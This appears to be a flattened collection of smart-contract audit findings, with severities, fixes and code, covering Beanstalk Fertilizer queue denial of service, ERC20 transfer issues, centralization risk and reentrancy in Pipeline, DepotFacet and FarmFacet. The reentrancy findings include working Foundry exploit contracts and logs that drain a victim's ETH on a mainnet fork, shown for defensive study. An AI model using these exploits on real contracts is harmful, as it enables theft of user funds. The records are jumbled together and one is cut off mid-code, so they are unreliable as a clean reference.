The validation performed to prevent duplicate ids is erroneously bypassed given the Fertilizer amount for the given Id remains zero.\\n```\\n function push(uint128 id) internal {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n if (s.fFirst == 0) {\\n // Queue is empty\\n s.season.fertilizing = true;\\n s.fLast = id;\\n s.fFirst = id;\\n } else if (id <= s.fFirst) {\\n // Add to front of queue\\n setNext(id, s.fFirst);\\n s.fFirst = id;\\n } else if (id >= s.fLast) { // @audit this block is entered twice\\n // Add to back of queue\\n setNext(s.fLast, id); // @audit the second time, a reference is added to the same id\\n s.fLast = id;\\n } else {\\n // Add to middle of queue\\n uint128 prev = s.fFirst;\\n uint128 next = getNext(prev);\\n // Search for proper place in line\\n while (id > next) {\\n prev = next;\\n next = getNext(next);\\n }\\n setNext(prev, id);\\n setNext(id, next);\\n }\\n }\\n```\\n\\nDespite first perhaps seeming harmless, this element can never be removed unless otherwise overridden:\\n```\\n function pop() internal returns (bool) {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n uint128 first = s.fFirst;\\n s.activeFertilizer = s.activeFertilizer.sub(getAmount(first)); // @audit getAmount(first) would return 0\\n uint128 next = getNext(first);\\n if (next == 0) { // @audit next != 0, therefore this conditional block is skipped\\n // If all Unfertilized Beans have been fertilized, delete line.\\n require(s.activeFertilizer == 0, \"Still active fertilizer\");\\n s.fFirst = 0;\\n s.fLast = 0;\\n s.season.fertilizing = false;\\n return false;\\n }\\n s.fFirst = getNext(first); // @audit this gets s.first again\\n return true; // @audit always returns true for a self-referential node\\n }\\n```\\n\\n`LibFertilizer::pop` is used in `Sun::rewardToFertilizer` which is called through `Sun::rewardBeans` when fertilizing. This function is called through `Sun::stepSun` if the current Bean price is above peg. 
By preventing the last element from being popped from the list, assuming this element is reached, an infinite loop occurs given that the `while` loop continues to execute, resulting in denial-of-service on `SeasonFacet::gm` when above peg.\\nThe most remarkable detail of this issue is that this state can be forced when above peg and having already been fully recapitalized. Given that it is not possible to mint additional Fertilizer with the associated Beans, this means that a DoS attack can be performed on `SeasonFacet::gm` once recapitalization is reached if the BEAN price is above peg.чDespite being a complex issue to explain, the solution is as simple as replacing `>` with `>=` in `LibFertilizer::addFertilizer` as below:\\n```\\n function addFertilizer(\\n uint128 season,\\n uint256 fertilizerAmount,\\n uint256 minLP\\n ) internal returns (uint128 id) {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n\\n uint128 fertilizerAmount128 = fertilizerAmount.toUint128();\\n\\n // Calculate Beans Per Fertilizer and add to total owed\\n uint128 bpf = getBpf(season);\\n s.unfertilizedIndex = s.unfertilizedIndex.add(\\n fertilizerAmount.mul(bpf)\\n );\\n // Get id\\n id = s.bpf.add(bpf);\\n // Update Total and Season supply\\n s.fertilizer[id] = s.fertilizer[id].add(fertilizerAmount128);\\n s.activeFertilizer = s.activeFertilizer.add(fertilizerAmount);\\n // Add underlying to Unripe Beans and Unripe LP\\n addUnderlying(fertilizerAmount.mul(DECIMALS), minLP);\\n // If not first time adding Fertilizer with this id, return\\n// Remove the line below\\n if (s.fertilizer[id] > fertilizerAmount128) return id;\\n// Add the line below\\n if (s.fertilizer[id] >= fertilizerAmount128) return id; // prevent infinite loop in `Sun::rewardToFertilizer` when attempting to add 0 Fertilizer, which could DoS `SeasonFacet::gm` when recapitalization is fulfilled\\n // If first time, log end Beans Per Fertilizer and add to Season queue.\\n push(id);\\n emit SetFertilizer(id, bpf);\\n 
}\\n```\\nчIt is possible to perform a denial-of-service (DoS) attack on `SeasonFacet::gm` if the Bean price is above the peg, either once fully recapitalized or when reaching the last element of the Fertilizer FIFO list.\\nProof of Concept: This coded PoC can be run by:\\nCreating file `Beantalk/protocol/test/POCs/mint0Fertilizer.test.js`\\nNavigating to `Beantalk/protocol`\\nRunning `yarn test --grep \"DOS last fertilizer payment through minting 0 fertilizers\"`ч```\\n// Previous code\\n\\n function addUnderlying(uint256 amount, uint256 minAmountOut) internal {\\n //// rest of code\\n C.bean().mint(\\n address(this),\\n newDepositedBeans.add(newDepositedLPBeans)\\n );\\n\\n // Add Liquidity\\n uint256 newLP = C.curveZap().add_liquidity(\\n C.CURVE_BEAN_METAPOOL, // where to add liquidity\\n [\\n newDepositedLPBeans, // BEANS to add\\n 0,\\n amount, // USDC to add\\n 0\\n ], // how much of each token to add\\n minAmountOut // min lp ampount to receive\\n ); // @audit-ok Does not admit depositing 0 --> https://etherscan.io/address/0x5F890841f657d90E081bAbdB532A05996Af79Fe6#code#L487\\n\\n // Increment underlying balances of Unripe Tokens\\n LibUnripe.incrementUnderlying(C.UNRIPE_BEAN, newDepositedBeans);\\n LibUnripe.incrementUnderlying(C.UNRIPE_LP, newLP);\\n\\n s.recapitalized = s.recapitalized.add(amount);\\n }\\n```\\n -Use safe transfer for ERC20 tokensчmediumчThe protocol intends to support all ERC20 tokens but the implementation uses the original transfer functions. Some tokens (like USDT) do not implement the EIP20 standard correctly and their transfer/transferFrom function return void instead of a success boolean. 
Calling these functions with the correct EIP20 function signatures will revert.\\n```\\nTransferUtils.sol\\n function _transferERC20(address token, address to, uint256 amount) internal {\\n IERC20 erc20 = IERC20(token);\\n require(erc20 != IERC20(address(0)), \"Token Address is not an ERC20\");\\n uint256 initialBalance = erc20.balanceOf(to);\\n require(erc20.transfer(to, amount), \"ERC20 Transfer failed\");//@audit-issue will revert for USDT\\n uint256 balance = erc20.balanceOf(to);\\n require(balance >= (initialBalance + amount), \"ERC20 Balance check failed\");\\n }\\n```\\nчWe recommend using OpenZeppelin's SafeERC20 versions with the safeTransfer and safeTransferFrom functions that handle the return value check as well as non-standard-compliant tokens.чTokens that do not correctly implement the EIP20 like USDT, will be unusable in the protocol as they revert the transaction because of the missing return value.ч```\\nTransferUtils.sol\\n function _transferERC20(address token, address to, uint256 amount) internal {\\n IERC20 erc20 = IERC20(token);\\n require(erc20 != IERC20(address(0)), \"Token Address is not an ERC20\");\\n uint256 initialBalance = erc20.balanceOf(to);\\n require(erc20.transfer(to, amount), \"ERC20 Transfer failed\");//@audit-issue will revert for USDT\\n uint256 balance = erc20.balanceOf(to);\\n require(balance >= (initialBalance + amount), \"ERC20 Balance check failed\");\\n }\\n```\\n -Fee-on-transfer tokens are not supportedчmediumчThe protocol intends to support all ERC20 tokens but does not support fee-on-transfer tokens. 
The protocol utilizes the functions `TransferUtils::_transferERC20()` and `TransferUtils::_transferFromERC20()` to transfer ERC20 tokens.\\n```\\nTransferUtils.sol\\n function _transferERC20(address token, address to, uint256 amount) internal {\\n IERC20 erc20 = IERC20(token);\\n require(erc20 != IERC20(address(0)), \"Token Address is not an ERC20\");\\n uint256 initialBalance = erc20.balanceOf(to);\\n require(erc20.transfer(to, amount), \"ERC20 Transfer failed\");\\n uint256 balance = erc20.balanceOf(to);\\n require(balance >= (initialBalance + amount), \"ERC20 Balance check failed\");//@audit-issue reverts for fee on transfer token\\n }\\n```\\n\\nThe implementation verifies that the transfer was successful by checking that the balance of the recipient is greater than or equal to the initial balance plus the amount transferred. This check will fail for fee-on-transfer tokens because the actual received amount will be less than the input amount. (Read here about fee-on-transfer tokens)\\nAlthough there are very few fee-on-transfer tokens, the protocol can't say it supports all ERC20 tokens if it doesn't support these weird ERC20 tokens.чThe transfer utility functions can be updated to return the actually received amount. Or clearly document that only standard ERC20 tokens are supported.чFee-on-transfer tokens can not be used for the protocol. 
Because of the rarity of these tokens, we evaluate this finding as a Medium risk.ч```\\nTransferUtils.sol\\n function _transferERC20(address token, address to, uint256 amount) internal {\\n IERC20 erc20 = IERC20(token);\\n require(erc20 != IERC20(address(0)), \"Token Address is not an ERC20\");\\n uint256 initialBalance = erc20.balanceOf(to);\\n require(erc20.transfer(to, amount), \"ERC20 Transfer failed\");\\n uint256 balance = erc20.balanceOf(to);\\n require(balance >= (initialBalance + amount), \"ERC20 Balance check failed\");//@audit-issue reverts for fee on transfer token\\n }\\n```\\n -Centralization riskчmediumчThe protocol has an owner with privileged rights to perform admin tasks that can affect users. Especially, the owner can change the fee settings and reward handler address.\\nValidation is missing for admin fee setter functions.\\n```\\nFeeData.sol\\n function setFeeValue(uint256 feeValue) external onlyOwner {\\n require(feeValue < _feeDenominator, \"Fee percentage must be less than 1\");\\n _feeValue = feeValue;\\n }\\n\\n function setFixedFee(uint256 fixedFee) external onlyOwner {//@audit-issue validate min/max\\n _fixedFee = fixedFee;\\n }\\n```\\n\\nImportant changes initiated by admin should be logged via events.\\n```\\nFile: helpers/FeeData.sol\\n\\n function setFeeValue(uint256 feeValue) external onlyOwner {\\n\\n function setMaxHops(uint256 maxHops) external onlyOwner {\\n\\n function setMaxSwaps(uint256 maxSwaps) external onlyOwner {\\n\\n function setFixedFee(uint256 fixedFee) external onlyOwner {\\n\\n function setFeeToken(address feeTokenAddress) public onlyOwner {\\n\\n function setFeeTokens(address[] memory feeTokenAddresses) public onlyOwner {\\n\\n function clearFeeTokens() public onlyOwner {\\n```\\n\\n```\\nFile: helpers/TransferHelper.sol\\n\\n function setRewardHandler(address rewardAddress) external onlyOwner {\\n\\n function setRewardsActive(bool _rewardsActive) external onlyOwner {\\n```\\nчSpecify the owner's privileges and 
responsibilities in the documentation.\\nAdd constant state variables that can be used as the minimum and maximum values for the fee settings.\\nAdd proper validation for the admin functions.\\nLog the changes in the important state variables via events.чWhile the protocol owner is regarded as a trusted party, the owner can change the fee settings and reward handler address without any validation or logging. This can lead to unexpected results and users can be affected.ч```\\nFeeData.sol\\n function setFeeValue(uint256 feeValue) external onlyOwner {\\n require(feeValue < _feeDenominator, \"Fee percentage must be less than 1\");\\n _feeValue = feeValue;\\n }\\n\\n function setFixedFee(uint256 fixedFee) external onlyOwner {//@audit-issue validate min/max\\n _fixedFee = fixedFee;\\n }\\n```\\n -Validation is missing for tokenA in `SwapExchange::calculateMultiSwap()`чlowчThe protocol supports claiming a chain of swaps and the function `SwapExchange::calculateMultiSwap()` is used to do some calculations including the amount of tokenA that can be received for a given amount of tokenB. Looking at the implementation, the protocol does not validate that the tokenA of the last swap in the chain is actually the same as the tokenA of `multiClaimInput`. Because this view function is supposed to be used by the frontend to 'preview' the result of a `MultiSwap`, this does not imply a direct security risk but can lead to unexpected results. 
(It is notable that the actual swap function `SwapExchange::_claimMultiSwap()` implemented a proper validation.)\\n```\\nSwapExchange.sol\\n function calculateMultiSwap(SwapUtils.MultiClaimInput calldata multiClaimInput) external view returns (SwapUtils.SwapCalculation memory) {\\n uint256 swapIdCount = multiClaimInput.swapIds.length;\\n if (swapIdCount == 0 || swapIdCount > _maxHops) revert Errors.InvalidMultiClaimSwapCount(_maxHops, swapIdCount);\\n if (swapIdCount == 1) {\\n SwapUtils.Swap memory swap = swaps[multiClaimInput.swapIds[0]];\\n return SwapUtils._calculateSwapNetB(swap, multiClaimInput.amountB, _feeValue, _feeDenominator, _fixedFee);\\n }\\n uint256 matchAmount = multiClaimInput.amountB;\\n address matchToken = multiClaimInput.tokenB;\\n uint256 swapId;\\n bool complete = true;\\n for (uint256 i = 0; i < swapIdCount; i++) {\\n swapId = multiClaimInput.swapIds[i];\\n SwapUtils.Swap memory swap = swaps[swapId];\\n if (swap.tokenB != matchToken) revert Errors.NonMatchingToken();\\n if (swap.amountB < matchAmount) revert Errors.NonMatchingAmount();\\n if (matchAmount < swap.amountB) {\\n if (!swap.isPartial) revert Errors.NotPartialSwap();\\n matchAmount = MathUtils._mulDiv(swap.amountA, matchAmount, swap.amountB);\\n complete = complete && false;\\n }\\n else {\\n matchAmount = swap.amountA;\\n }\\n matchToken = swap.tokenA;\\n }\\n (uint8 feeType,) = _calculateFeeType(multiClaimInput.tokenA, multiClaimInput.tokenB);//@audit-issue no validation matchToken == multiClaimInput.tokenA\\n uint256 fee = FeeUtils._calculateFees(matchAmount, multiClaimInput.amountB, feeType, swapIdCount, _feeValue, _feeDenominator, _fixedFee);\\n SwapUtils.SwapCalculation memory calculation;\\n calculation.amountA = matchAmount;\\n calculation.amountB = multiClaimInput.amountB;\\n calculation.fee = fee;\\n calculation.feeType = feeType;\\n calculation.isTokenBNative = multiClaimInput.tokenB == Constants.NATIVE_ADDRESS;\\n calculation.isComplete = complete;\\n 
calculation.nativeSendAmount = SwapUtils._calculateNativeSendAmount(calculation.amountB, calculation.fee, calculation.feeType, calculation.isTokenBNative);\\n return calculation;\\n }\\n```\\nчAdd a validation that the tokenA of the last swap in the chain is the same as the tokenA of `multiClaimInput`.чThe function will return an incorrect swap calculation result if the last swap in the chain has a different tokenA than the tokenA of `multiClaimInput` and it can lead to unexpected results.ч```\\nSwapExchange.sol\\n function calculateMultiSwap(SwapUtils.MultiClaimInput calldata multiClaimInput) external view returns (SwapUtils.SwapCalculation memory) {\\n uint256 swapIdCount = multiClaimInput.swapIds.length;\\n if (swapIdCount == 0 || swapIdCount > _maxHops) revert Errors.InvalidMultiClaimSwapCount(_maxHops, swapIdCount);\\n if (swapIdCount == 1) {\\n SwapUtils.Swap memory swap = swaps[multiClaimInput.swapIds[0]];\\n return SwapUtils._calculateSwapNetB(swap, multiClaimInput.amountB, _feeValue, _feeDenominator, _fixedFee);\\n }\\n uint256 matchAmount = multiClaimInput.amountB;\\n address matchToken = multiClaimInput.tokenB;\\n uint256 swapId;\\n bool complete = true;\\n for (uint256 i = 0; i < swapIdCount; i++) {\\n swapId = multiClaimInput.swapIds[i];\\n SwapUtils.Swap memory swap = swaps[swapId];\\n if (swap.tokenB != matchToken) revert Errors.NonMatchingToken();\\n if (swap.amountB < matchAmount) revert Errors.NonMatchingAmount();\\n if (matchAmount < swap.amountB) {\\n if (!swap.isPartial) revert Errors.NotPartialSwap();\\n matchAmount = MathUtils._mulDiv(swap.amountA, matchAmount, swap.amountB);\\n complete = complete && false;\\n }\\n else {\\n matchAmount = swap.amountA;\\n }\\n matchToken = swap.tokenA;\\n }\\n (uint8 feeType,) = _calculateFeeType(multiClaimInput.tokenA, multiClaimInput.tokenB);//@audit-issue no validation matchToken == multiClaimInput.tokenA\\n uint256 fee = FeeUtils._calculateFees(matchAmount, multiClaimInput.amountB, feeType, swapIdCount, 
_feeValue, _feeDenominator, _fixedFee);\\n SwapUtils.SwapCalculation memory calculation;\\n calculation.amountA = matchAmount;\\n calculation.amountB = multiClaimInput.amountB;\\n calculation.fee = fee;\\n calculation.feeType = feeType;\\n calculation.isTokenBNative = multiClaimInput.tokenB == Constants.NATIVE_ADDRESS;\\n calculation.isComplete = complete;\\n calculation.nativeSendAmount = SwapUtils._calculateNativeSendAmount(calculation.amountB, calculation.fee, calculation.feeType, calculation.isTokenBNative);\\n return calculation;\\n }\\n```\\n -Intermediate value sent by the caller can be drained via reentrancy when `Pipeline` execution is handed off to an untrusted external contractчhighчPipeline is a utility contract created by the Beanstalk Farms team that enables the execution of an arbitrary number of valid actions in a single transaction. The `DepotFacet` is a wrapper around Pipeline for use within the Beanstalk Diamond proxy. When utilizing Pipeline through the `DepotFacet`, Ether value is first loaded by a payable call to the Diamond proxy fallback function, which then delegates execution to the logic of the respective facet function. 
Once the `DepotFacet::advancedPipe` is called, for example, value is forwarded on to a function of the same name within Pipeline.\\n```\\nfunction advancedPipe(AdvancedPipeCall[] calldata pipes, uint256 value)\\n external\\n payable\\n returns (bytes[] memory results)\\n{\\n results = IPipeline(PIPELINE).advancedPipe{value: value}(pipes);\\n LibEth.refundEth();\\n}\\n```\\n\\nThe important point to note here is that rather than sending the full Ether amount received by the Diamond proxy, the amount sent to Pipeline is equal to that of the `value` argument above, necessitating the use of `LibEth::refundEth`, which itself transfers the entire proxy Ether balance to the caller, following the call to return any unspent Ether.\\n```\\nfunction refundEth()\\n internal\\n{\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n if (address(this).balance > 0 && s.isFarm != 2) {\\n (bool success, ) = msg.sender.call{value: address(this).balance}(\\n new bytes(0)\\n );\\n require(success, \"Eth transfer Failed.\");\\n }\\n}\\n```\\n\\nThis logic appears to be correct and work as intended; however, issues can arise due to the lack of reentrancy guard on `DepotFacet` and `Pipeline` functions. 
Given the nature of `Pipeline` calls to potentially untrusted external contracts, which themselves may also hand off execution to their own set of untrusted external contracts, this can become an issue if a malicious contract calls back into Beanstalk and/or `Pipeline`.\\n```\\nfunction advancedPipe(AdvancedPipeCall[] calldata pipes)\\n external\\n payable\\n override\\n returns (bytes[] memory results) {\\n results = new bytes[](pipes.length);\\n for (uint256 i = 0; i < pipes.length; ++i) {\\n results[i] = _advancedPipe(pipes[i], results);\\n }\\n }\\n```\\n\\nContinuing with the example of `DepotFacet::advancedPipe`, say, for example, one of the pipe calls involves an NFT mint/transfer in which some external contract is paid royalties in the form of a low-level call with ETH attached or some safe transfer check hands-off execution in this way, the malicious recipient could initiate a call to the Beanstalk Diamond which once again triggers `DepotFacet::advancedPipe` but this time with an empty `pipes` array. Given the implementation of `Pipeline::advancedPipe` above, this will simply return an empty bytes array and fall straight through to the ETH refund. Since the proxy balance is non-zero, assuming `value != msg.value` in the original call, this `msg.value - value` difference will be transferred to the malicious caller. Once execution returns to the original context and the original caller's transaction is nearing completion, the contract will no longer have any excess ETH, even though it is the original caller who should have received a refund of unspent funds.\\nThis finding also applies to `Pipeline` itself, in which a malicious contract can similarly reenter `Pipeline` and utilize intermediate Ether balance without sending any `value` of their own. 
For example, given `getEthValue` does not validate the clipboard `value` against the payable `value` (likely due to its current usage within a loop), `Pipeline::advancedPipe` could be called with a single `AdvancedPipeCall` with normal pipe encoding which calls another address owned by the attacker, again forwarding all remaining Ether given they are able to control the `value` parameter. It is, of course, feasible that the original caller attempts to perform some other more complicated pipes following the first, which may revert with 'out of funds' errors, causing the entire advanced pipe call to fail if no tolerant mode behavior is implemented on the target contract, so the exploiter would need to be strategic in these scenarios if they wish to elevate their exploit from denial-of-service to the stealing of funds.чAdd reentrancy guards to both the `DepotFacet` and `Pipeline`. Also, consider validating clipboard Ether values in `Pipeline::_advancedPipe` against the payable function value in `Pipeline::advancedPipe`.чA malicious external contract handed control of execution during the lifetime of a Pipeline call can reenter and steal intermediate user funds. 
As such, this finding is determined to be of HIGH severity.\\nProof of Concept: The following forge test demonstrates the ability of an NFT royalty recipient, for example, to re-enter both Beanstalk and Pipeline, draining funds remaining in the Diamond and Pipeline that should have been refunded to/utilized by the original caller at the end of execution:\\n```\\ncontract DepotFacetPoC is Test {\\n RoyaltyRecipient exploiter;\\n address exploiter1;\\n DummyNFT dummyNFT;\\n address victim;\\n\\n function setUp() public {\\n vm.createSelectFork(\"mainnet\", ATTACK_BLOCK);\\n\\n exploiter = new RoyaltyRecipient();\\n dummyNFT = new DummyNFT(address(exploiter));\\n victim = makeAddr(\"victim\");\\n vm.deal(victim, 10 ether);\\n\\n exploiter1 = makeAddr(\"exploiter1\");\\n console.log(\"exploiter1: \", exploiter1);\\n\\n address _pipeline = address(new Pipeline());\\n vm.etch(PIPELINE, _pipeline.code);\\n\\n vm.label(BEANSTALK, \"Beanstalk Diamond\");\\n vm.label(address(dummyNFT), \"DummyNFT\");\\n vm.label(address(exploiter), \"Exploiter\");\\n }\\n\\n function test_attack() public {\\n emit log_named_uint(\"Victim balance before: \", victim.balance);\\n emit log_named_uint(\"BEANSTALK balance before: \", BEANSTALK.balance);\\n emit log_named_uint(\"PIPELINE balance before: \", PIPELINE.balance);\\n emit log_named_uint(\"DummyNFT balance before: \", address(dummyNFT).balance);\\n emit log_named_uint(\"Exploiter balance before: \", address(exploiter).balance);\\n emit log_named_uint(\"Exploiter1 balance before: \", exploiter1.balance);\\n\\n vm.startPrank(victim);\\n AdvancedPipeCall[] memory pipes = new AdvancedPipeCall[](1);\\n pipes[0] = AdvancedPipeCall(address(dummyNFT), abi.encodePacked(dummyNFT.mintNFT.selector), abi.encodePacked(bytes1(0x00), bytes1(0x01), uint256(1 ether)));\\n IBeanstalk(BEANSTALK).advancedPipe{value: 10 ether}(pipes, 4 ether);\\n vm.stopPrank();\\n\\n emit log_named_uint(\"Victim balance after: \", victim.balance);\\n emit 
log_named_uint(\"BEANSTALK balance after: \", BEANSTALK.balance);\\n emit log_named_uint(\"PIPELINE balance after: \", PIPELINE.balance);\\n emit log_named_uint(\"DummyNFT balance after: \", address(dummyNFT).balance);\\n emit log_named_uint(\"Exploiter balance after: \", address(exploiter).balance);\\n emit log_named_uint(\"Exploiter1 balance after: \", exploiter1.balance);\\n }\\n}\\n\\ncontract DummyNFT {\\n address immutable i_royaltyRecipient;\\n constructor(address royaltyRecipient) {\\n i_royaltyRecipient = royaltyRecipient;\\n }\\n\\n function mintNFT() external payable returns (bool success) {\\n // imaginary mint/transfer logic\\n console.log(\"minting/transferring NFT\");\\n // console.log(\"msg.value: \", msg.value);\\n\\n // send royalties\\n uint256 value = msg.value / 10;\\n console.log(\"sending royalties\");\\n (success, ) = payable(i_royaltyRecipient).call{value: value}(\"\");\\n }\\n}\\n\\ncontract RoyaltyRecipient {\\n bool exploited;\\n address constant exploiter1 = 0xDE47CfF686C37d501AF50c705a81a48E16606F08;\\n\\n fallback() external payable {\\n console.log(\"entered exploiter fallback\");\\n console.log(\"Beanstalk balance: \", BEANSTALK.balance);\\n console.log(\"Pipeline balance: \", PIPELINE.balance);\\n console.log(\"Exploiter balance: \", address(this).balance);\\n if (!exploited) {\\n exploited = true;\\n console.log(\"exploiting depot facet advanced pipe\");\\n IBeanstalk(BEANSTALK).advancedPipe(new AdvancedPipeCall[](0), 0);\\n console.log(\"exploiting pipeline advanced pipe\");\\n AdvancedPipeCall[] memory pipes = new AdvancedPipeCall[](1);\\n pipes[0] = AdvancedPipeCall(address(exploiter1), \"\", abi.encodePacked(bytes1(0x00), bytes1(0x01), uint256(PIPELINE.balance)));\\n IPipeline(PIPELINE).advancedPipe(pipes);\\n }\\n }\\n}\\n```\\n\\nAs can be seen in the output below, the exploiter is able to net 9 additional Ether at the expense of the victim:\\n```\\nRunning 1 test for test/DepotFacetPoC.t.sol:DepotFacetPoC\\n[PASS] 
test_attack() (gas: 182190)\\nLogs:\\n exploiter1: 0xDE47CfF686C37d501AF50c705a81a48E16606F08\\n Victim balance before: : 10000000000000000000\\n BEANSTALK balance before: : 0\\n PIPELINE balance before: : 0\\n DummyNFT balance before: : 0\\n Exploiter balance before: : 0\\n Exploiter1 balance before: : 0\\n entered pipeline advanced pipe\\n msg.value: 4000000000000000000\\n minting/transferring NFT\\n sending royalties\\n entered exploiter fallback\\n Beanstalk balance: 6000000000000000000\\n Pipeline balance: 3000000000000000000\\n Exploiter balance: 100000000000000000\\n exploiting depot facet advanced pipe\\n entered pipeline advanced pipe\\n msg.value: 0\\n entered exploiter fallback\\n Beanstalk balance: 0\\n Pipeline balance: 3000000000000000000\\n Exploiter balance: 6100000000000000000\\n exploiting pipeline advanced pipe\\n entered pipeline advanced pipe\\n msg.value: 0\\n Victim balance after: : 0\\n BEANSTALK balance after: : 0\\n PIPELINE balance after: : 0\\n DummyNFT balance after: : 900000000000000000\\n Exploiter balance after: : 6100000000000000000\\n Exploiter1 balance after: : 3000000000000000000\\n```\\nч```\\nfunction advancedPipe(AdvancedPipeCall[] calldata pipes, uint256 value)\\n external\\n payable\\n returns (bytes[] memory results)\\n{\\n results = IPipeline(PIPELINE).advancedPipe{value: value}(pipes);\\n LibEth.refundEth();\\n}\\n```\\n -`FarmFacet` functions are susceptible to the draining of intermediate value sent by the caller via reentrancy when execution is handed off to an untrusted external contractчhighчThe `FarmFacet` enables multiple Beanstalk functions to be called in a single transaction using Farm calls. 
Any function stored in Beanstalk's EIP-2535 DiamondStorage can be called as a Farm call and, similar to the Pipeline calls originated in the `DepotFacet`, advanced Farm calls can be made within `FarmFacet` utilizing the \"clipboard\" encoding documented in `LibFunction`.\\nBoth `FarmFacet::farm` and `FarmFacet::advancedFarm` make use of the `withEth` modifier defined as follows:\\n```\\n// signals to Beanstalk functions that they should not refund Eth\\n// at the end of the function because the function is wrapped in a Farm function\\nmodifier withEth() {\\n if (msg.value > 0) s.isFarm = 2;\\n _;\\n if (msg.value > 0) {\\n s.isFarm = 1;\\n LibEth.refundEth();\\n }\\n}\\n```\\n\\nUsed in conjunction with `LibEth::refundEth`, within the `DepotFacet`, for example, the call is identified as originating from the `FarmFacet` if `s.isFarm == 2`. This indicates that an ETH refund should occur at the end of top-level `FarmFacet` function call rather than intermediate Farm calls within Beanstalk so that the value can be utilized in subsequent calls.\\n```\\nfunction refundEth()\\n internal\\n{\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n if (address(this).balance > 0 && s.isFarm != 2) {\\n (bool success, ) = msg.sender.call{value: address(this).balance}(\\n new bytes(0)\\n );\\n require(success, \"Eth transfer Failed.\");\\n }\\n}\\n```\\n\\nSimilar to the vulnerabilities in `DepotFacet` and `Pipeline`, `FarmFacet` Farm functions are also susceptible to the draining of intermediate value sent by the caller via reentrancy by an untrusted and malicious external contract. 
In this case, the attacker could be the recipient of Beanstalk Fertilizer, for example, given this is a likely candidate for an action that may be performed via `FarmFacet` functions, utilizing `TokenSupportFacet::transferERC1155`, and because transfers of these tokens are performed \"safely\" by calling `Fertilizer1155:__doSafeTransferAcceptanceCheck` which in turn calls the `IERC1155ReceiverUpgradeable::onERC1155Received` hook on the Fertilizer recipient.\\nContinuing the above example, a malicious recipient could call back into the `FarmFacet` and re-enter the Farm functions via the `Fertilizer1155` safe transfer acceptance check with empty calldata and only `1 wei` of payable value. This causes the execution of the attacker's transaction to fall straight through to the refund logic, given no loop iterations occur on the empty data and the conditional blocks within the modifier are entered due to the (ever so slightly) non-zero `msg.value`. The call to `LibEth::refundEth` will succeed since `s.isFarm == 1` in the attacker's context, sending the entire Diamond proxy balance. When execution continues in the context of the original caller's Farm call, it will still enter the conditional since their `msg.value` was also non-zero; however, there is no longer any ETH balance to refund, so this call will fall through without sending any value as the conditional block is not entered.чAdd a reentrancy guard to `FarmFacet` Farm functions.\\n\\clearpageчA malicious external contract handed control of execution during the lifetime of a Farm call can reenter and steal intermediate user funds. 
As such, this finding is determined to be of HIGH severity.\\nProof of Concept: The following forge test demonstrates the ability of a Fertilizer recipient, for example, to re-enter Beanstalk, draining funds remaining in the Diamond that should have been refunded to the original caller at the end of execution:\\n```\\ncontract FertilizerRecipient {\\n bool exploited;\\n\\n function onERC1155Received(address, address, uint256, uint256, bytes calldata) external returns (bytes4) {\\n console.log(\"entered exploiter onERC1155Received\");\\n if (!exploited) {\\n exploited = true;\\n console.log(\"exploiting farm facet farm call\");\\n AdvancedFarmCall[] memory data = new AdvancedFarmCall[](0);\\n IBeanstalk(BEANSTALK).advancedFarm{value: 1 wei}(data);\\n console.log(\"finished exploiting farm facet farm call\");\\n }\\n return bytes4(0xf23a6e61);\\n }\\n\\n fallback() external payable {\\n console.log(\"entered exploiter fallback\");\\n console.log(\"Beanstalk balance: \", BEANSTALK.balance);\\n console.log(\"Exploiter balance: \", address(this).balance);\\n }\\n}\\n\\ncontract FarmFacetPoC is Test {\\n uint256 constant TOKEN_ID = 3445713;\\n address constant VICTIM = address(0x995D1e4e2807Ef2A8d7614B607A89be096313916);\\n FertilizerRecipient exploiter;\\n\\n function setUp() public {\\n vm.createSelectFork(\"mainnet\", ATTACK_BLOCK);\\n\\n FarmFacet farmFacet = new FarmFacet();\\n vm.etch(FARM_FACET, address(farmFacet).code);\\n\\n Fertilizer fert = new Fertilizer();\\n vm.etch(FERTILIZER, address(fert).code);\\n\\n assertGe(IERC1155(FERTILIZER).balanceOf(VICTIM, TOKEN_ID), 1, \"Victim does not have token\");\\n\\n exploiter = new FertilizerRecipient();\\n vm.deal(address(exploiter), 1 wei);\\n\\n vm.label(VICTIM, \"VICTIM\");\\n vm.deal(VICTIM, 10 ether);\\n\\n vm.label(BEANSTALK, \"Beanstalk Diamond\");\\n vm.label(FERTILIZER, \"Fertilizer\");\\n vm.label(address(exploiter), \"Exploiter\");\\n }\\n\\n function test_attack() public {\\n emit log_named_uint(\"VICTIM 
balance before: \", VICTIM.balance);\\n emit log_named_uint(\"BEANSTALK balance before: \", BEANSTALK.balance);\\n emit log_named_uint(\"Exploiter balance before: \", address(exploiter).balance);\\n\\n vm.startPrank(VICTIM);\\n // approve Beanstalk to transfer Fertilizer\\n IERC1155(FERTILIZER).setApprovalForAll(BEANSTALK, true);\\n\\n // encode call to `TokenSupportFacet::transferERC1155`\\n bytes4 selector = 0x0a7e880c;\\n assertEq(IBeanstalk(BEANSTALK).facetAddress(selector), address(0x5e15667Bf3EEeE15889F7A2D1BB423490afCb527), \"Incorrect facet address/invalid function\");\\n\\n AdvancedFarmCall[] memory data = new AdvancedFarmCall[](1);\\n data[0] = AdvancedFarmCall(abi.encodeWithSelector(selector, address(FERTILIZER), address(exploiter), TOKEN_ID, 1), abi.encodePacked(bytes1(0x00)));\\n IBeanstalk(BEANSTALK).advancedFarm{value: 10 ether}(data);\\n vm.stopPrank();\\n\\n emit log_named_uint(\"VICTIM balance after: \", VICTIM.balance);\\n emit log_named_uint(\"BEANSTALK balance after: \", BEANSTALK.balance);\\n emit log_named_uint(\"Exploiter balance after: \", address(exploiter).balance);\\n }\\n}\\n```\\n\\nAs can be seen in the output below, the exploiter is able to steal the excess 10 Ether sent by the victim:\\n```\\nRunning 1 test for test/FarmFacetPoC.t.sol:FarmFacetPoC\\n[PASS] test_attack() (gas: 183060)\\nLogs:\\n VICTIM balance before: : 10000000000000000000\\n BEANSTALK balance before: : 0\\n Exploiter balance before: : 1\\n data.length: 1\\n entered __doSafeTransferAcceptanceCheck\\n to is contract, calling hook\\n entered exploiter onERC1155Received\\n exploiting farm facet farm call\\n data.length: 0\\n entered exploiter fallback\\n Beanstalk balance: 0\\n Exploiter balance: 10000000000000000001\\n finished exploiting farm facet farm call\\n VICTIM balance after: : 0\\n BEANSTALK balance after: : 0\\n Exploiter balance after: : 10000000000000000001\\n```\\nч```\\n// signals to 